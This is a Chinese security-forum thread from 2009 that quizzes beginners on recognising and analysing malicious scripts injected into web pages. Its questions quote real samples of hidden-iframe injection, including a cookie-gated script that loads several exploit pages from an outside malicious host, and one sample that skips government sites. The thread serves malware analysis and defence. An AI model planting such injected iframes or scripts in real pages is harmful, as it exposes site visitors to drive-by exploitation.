瑞星卡卡安全论坛技术交流区恶意网站交流 网马解密初级篇知识点巩固(考核)

1   1  /  1  页   跳转

网马解密初级篇知识点巩固(考核)

网马解密初级篇知识点巩固(考核)

卡卡讲堂之网马解密 初级篇
卡卡讲堂之网马解密 中级篇
卡卡讲堂之网马解密 高级篇(swf网马解密)
卡卡讲堂之网马解密 高级篇(pdf网马解密)
1.Freshow解密工具的详细用法
2.网马解密之——Eval篇
3.网马解密之——Document.write篇
4.网马解密之——Alpha2篇
5.网马解密之——Shellcode篇
6.网马解密之——Base64篇
7.网马解密之——US-ASCII篇
8.浅谈eval解密之——工具篇


网马解密的初级教程基本完成,为了加强初学者的记忆,根据初级教程的内容,编写几道小测试题,希望初学者能踊跃参与,跟帖进行讨论。(最好不要照抄原文哟,已自己能理解的方式来回答)


1.请列举出几种常见网页挂马方式;

2.常见网页挂马所利用的漏洞有哪些

3.请说出下列挂马方式属于哪一种挂马方式
a) if(document.location.href.indexOf("gov")>=0)
{} else {document.write("<div style='display:none'>")
document.write("<iframe src=hxxp://xxxo1.cn/a/a7.htm></iframe>")
document.write("</div>")}
b)<iframe src="cnzz.htm" width=111 height=0 border=0></iframe>
c)<script src="14.js"></script>
4.下列网页挂马用到了哪些系统的漏洞及第三方软件的漏洞
function Get(){
var Then = new Date()
Then.setTime(Then.getTime() + 24*60*60*1000)
var cookieString = new String(document.cookie)
var cookieHeader = "Cookie1="
var beginPosition = cookieString.indexOf(cookieHeader)
if (beginPosition != -1){
} else
{ document.cookie = "Cookie1=nishisb;expires="+ Then.toGMTString()
document.writeln("<iframe width=100 height=1 src=http:\/\/cn.com.fengyunfz.com.cn\/images\/images\/bf.htm><\/iframe>");
document.writeln("<iframe width=100 height=1 src=http:\/\/cn.com.fengyunfz.com.cn\/images\/images\/swf.htm><\/iframe>");
document.writeln("<iframe width=100 height=1 src=http:\/\/cn.com.fengyunfz.com.cn\/images\/images\/real2.htm><\/iframe>");
document.writeln("<iframe width=100 height=1 src=http:\/\/cn.com.fengyunfz.com.cn\/images\/images\/old.htm><\/iframe>");
document.writeln("<iframe width=100 height=1 src=http:\/\/cn.com.fengyunfz.com.cn\/images\/images\/09002.htm><\/iframe>");
document.writeln("<iframe width=100 height=1 src=http:\/\/cn.com.fengyunfz.com.cn\/images\/images\/tj.htm><\/iframe>");
}
}Get();

用户系统信息:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
本帖被评分 1 次
最后编辑networkedition 最后编辑于 2009-05-21 14:46:15
分享到:
gototop
 

回复 4F 水中蝌蚪 的帖子

document.write("<iframe src=hxxp://xxxo1.cn/a/a7.htm></iframe>")
可通过此句来判断
gototop
 

回复 6F 水中蝌蚪 的帖子

Microsoft JScript 提供了两种方式来在浏览器中直接显示数据。可以使用write( ) 和 writeln( ),这两个函数是document 对象的方法。也可以在浏览器中以表格的方式显示信息,以及用警告、提示和确认消息框来显示信息。

使用document.write( ) 和 document.writeln( )
显示信息最常用的方式是 document 对象的 write( ) 方法。该方法用一个字符串作为其参数,并在浏览器中显示。该字符串可以是普通文本或 HTML。

Document.write函数是将字符串转换为Html代码,里面必须有HTML脚本标签,脚本才可以执行,否则,将会被当作字符串输出在网页上。
gototop
 

回复 8F 水中蝌蚪 的帖子

我写了两个小例子,可以直接运行后看看效果,另外可以看看源代码,比较有什么不同就明白了。

附件附件:

文件名:例子.rar
下载次数:759
文件类型:application/octet-stream
文件大小:
上传时间:2009-5-15 14:48:32
描述:rar

gototop
 

回复 10F 艾玛 的帖子

大版主多多指导呀
gototop
 
1   1  /  1  页   跳转
页面顶部
Powered by Discuz!NT